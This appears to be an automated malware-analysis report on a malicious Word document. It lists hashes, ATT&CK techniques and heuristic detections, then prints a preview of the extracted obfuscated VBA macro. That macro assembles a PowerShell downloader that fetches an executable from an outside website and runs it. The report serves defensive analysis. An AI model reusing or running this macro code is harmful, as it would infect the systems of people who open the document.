Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8714fc9545f75320…

MALICIOUS

Office (OLE)

143.5 KB Created: 2017-12-05 20:23:00 Authoring application: Microsoft Office Word First seen: 2017-12-09
MD5: 8507ac71d54b5fcdcd211c792a7af774 SHA-1: 67e83c6c77069bb9df91b778759e83de376d867e SHA-256: 8714fc9545f75320ff375d6e807691ef327194a8942ac8695ceb0a18cacce1b3
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro utilizes a Shell() call and obfuscated string concatenation to construct and execute a URL, which likely serves as a downloader for a second-stage payload. The presence of the AutoOpen macro and the Shell() call strongly indicate malicious intent.

Heuristics 7

  • ClamAV: Doc.Macro.Obfuscation-6394109-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6394109-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 50156 bytes
SHA-256: b3b082f538c10dcb27a912351a9df8f9b8d78c5d8e87a559db73e237d08654c1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "SXJzpjlQVKiOD"
Function FFVjzIwvtMPzG()
sippEWSB = Array("MpHmWDNmpnD" + "rCilAIR" + "cjQROzJsQzKC" + "fHUkiYMcCj" + "GFUwNdFMl")
kJLjDZ = Mid("2dBXgJr+gJrTm;9zXT'+'+zXTTzXT+zXT7zXT'+'+zXTbczXT+zXTd = WfDhttpzXTgJr+gJr+zXT:gJr+gJr//www.rentagJr+gJrlhtmamz'+'XT+zXTamia.czXT+zXTomzXT+zXT/nzXT+zXTPmD/zXT+zXT'+',zXT+wLpPPFS8wiBPEIbYJ2rE0WzXirO", 4, 167)
kBIjJnu = Array("uTIGzVtdW" + "hcRFSbZ" + "HofFfFBH" + "KrVvQqpWCJ" + "MwwOFVCh")
zRWcov = Array("zdZpYXtVVpcAkM" + "OARkEKZCBLIiNf" + "uwQajiuuKBTGh" + "mFVIBwcnchkZa" + "iPsjqhuijK")
TNPFrjhsFRc = Array("ZwnrNGjc" + "aBobcnJYnMsSn" + "FdKAVpEYj" + "TUzspDDozctI" + "LfNKzZlwtlfh")
EHarHcV = Mid("6HreazXT+zXTkzXT+zXT;}catch{write'+'-hzXT+zXTo'+'st 9T7_.EzXT+zXTxceptiozXT+zXTnzXT+zXT.MeszXT+zXTsagzXT+zXTe;zXT+zXT}'+'}zXT)-CrEPLACEg08ttwO6WNvIWilkUYShhc9Efi0adfnl", 3, 134)
CzScZncnrcN = Array("QUFHilDrKOF" + "WMjLHWjqGDWQu" + "mQzzIVKd" + "iWftwjhQJYcV" + "KWmHAUYMzp")
YkkOGOM = Array("CFOnpCUHI" + "pRjjIDTK" + "zwzVIfEwvk" + "iRKbAzaMnq" + "ZCXYtQpdsaaGk")
XNQbSWk = Array("DYbwGmWVwv" + "ijRMjwmz" + "CUvuTcAj" + "fCzdfEnwMqbwiG" + "GYlfoGKUVFRic")
zHObbVUvKQp = Mid("kaq9AVkS2KoT+zXgJr+gJrT6jnM4", 12, 12)
CwhtVmOlS = Array("DkGHkEZWi" + "XGHjKdGXiJ" + "wwjlnISszH" + "aIzNUECm" + "DUzAmIGSP")
IwiNavc = Array("dilmWRsHBDNZ" + "mvVLTOEnuqUu" + "UiiXOVKRjMpLM" + "wwXhSPYXYzuzU" + "tinRsdwKdd")
jzNcl = Array("ZqarBLI" + "XiSTdRcdMbUL" + "ZHVTptIGarlW" + "SjaQUiKNTLwli" + "njvYhnSA")
rbIod = Mid("icaYoDjU2264cotinsPJqXPK62iYcb2JwDJr+gJrT7envzXT+zXT:publiczXT+zXT +zXT+'+'zXT WfzXT+zXTDczXT+zgJr+gJrXTwYWfD + 9zXT+zXTTzXT+zXT7karapazXjH", 35, 103)
DwKfVro = Array("sOQCjjAGaGoWJ" + "fUzJicQ" + "nYBYXTj" + "nVtraBIVpTuqu" + "ELiPMIzBw")
oZpjjNtJp = Array("FYLRzawqjzjz" + "DwHqBUGvWiGhV" + "fTEjaSzVsI" + "KmWVRowN" + "fzRrmztoipEkiD")
ZJMVQPfAiwO = Array("CMlTORfJj" + "BuAJzfbPUSnbtl" + "zBOOvJHGMiVS" + "aJJWRCsXNmP" + "nNaicbTAjPP")
TQIHp = Mid("Ujfnmvln9z67vTent;9T7zXT+zXTgJ'+'r+gJrnsadasdzXT+zXT = zXT+zXTnew-ozXT+zXTbjzXT+zXTeczXT+gJr+gJrzXTt rgJr+gJrandozXT+zgJr+gJraYlvWFtvCl", 14, 112)
ZjGioKDzikV = Array("WcNJhtiEw" + "qikZFuITbrj" + "NwdYKmC" + "cjiEwpa" + "jAzuSNvPJOduw")
hlPWZzKfj = Array("unluoofiM" + "oLIQJrtMmOzjIv" + "ckCCSuLtsciQ" + "jYGkRqYPWLRbGX" + "BSKipNMEcbu")
ndljQBvaYB = Array("vGfrBiiva" + "XfAKFtiFvcbUz" + "wZzcSzV" + "mIoRpmHoKz" + "PwGABpWOwz")
oOXKYKzIfYn = Mid("UIK6zmADaDFSoKpIIQa7DUkfoZNzXT9T7gJr+gJrzXT+zXTbcd)zXT+gJr+gJrzXT{tzX'+'T+zXTry{9T7frgJr+gJrzX'+'T+zXTanc.DownloadFzXT+zgJr+gJrXTilezXT+zXT(9zXT+zgJr+'+'gJr'+'XTT7abzXT+zXTcz'+'XT+zXT.ToSzXT+zXTtzXT+zXTring(),zXT+zXT 9TRvvwmw2F", 28, 192)
LoaTPK = Array("dSQofav" + "NIOSRXRFYla" + "XisZRzak" + "UiJXpvzGWm" + "LuPsEsN")
jJlUjEzXRrq = Array("qaGdtbiBcaUw" + "rVoErzGRbzkDr" + "wnwkWbBROL" + "tjFIXwvz" + "JjBRXBqSP")
RPDUbwuQwv = Array("cBdcmJYWn" + "GofPNvq" + "JjtOFokvYrJ" + "QVoDSpcV" + "MKCkTSvKuzfru")
nISwRd = Mid("UQzwHGYlAnRizskEqMkrvr2FnNHiz'+'XT+zXT7o2P5", 29, 11)
lCfZqTvaS = Array("WZBDkOjqzXr" + "HcswRAJEBoD" + "PSmiNVliCkp" + "scVurFwcViYY" + "YkpJKbhVWn")
GofwciFqiiT = Array("GZNwprrkj" + "fpkzcwXTU" + "wWqdlVokiudQ" + "IidEtniwbd" + "EiiwizZMWJQki")
bkcHZO = Array("ZuNNuzA" + "jvhNRbYlMpvFOI" + "mRnvbmTEULh" + "BSTcwrkbJzw" + "wrhJRoOoQQav")
jwlDbTm = Mid("zjJKs + WfD.zXT+zXTexeWzXT+zXTfD;forez'+'XT+zXTach(9T7aEi1AzvLtUIjsK", 5, 51)
ktiGwAEiXk = Array("LTCGGlkPTcRw" + "djpmUsBYGnsCj" + "RtMrzvTiTb" + "VsEpLFfkEwfhW" + "rjLEjKEZQSWHkT")
OhFci = Array("DYKQqMCj" + "XTsNzNijUnUAzk" + "JmfwtOl" + "XVtTZLSmuDCUO" + "DpAKkvmaG")
XhfrIpnvh = Array("YPOUqIGC" + "WYcRPlQnvllYjE" + "XFqiOwSwHdGDpt" + "jFTmPXiTq" + "zFqPXlrLSz")
rRihwrlLck = Mid("ul8tHMjr6Ys6tH84LhzXT+zXTuazXT+zXTs);IzXT+zXTnzXgJr+gJrT+zXTvogJr+gJrke-ItezXTgJr+gJr+zXTmzXT+zXT(9T7h'+'zXT+Xv5aIQczjji9DIrJM
... (truncated)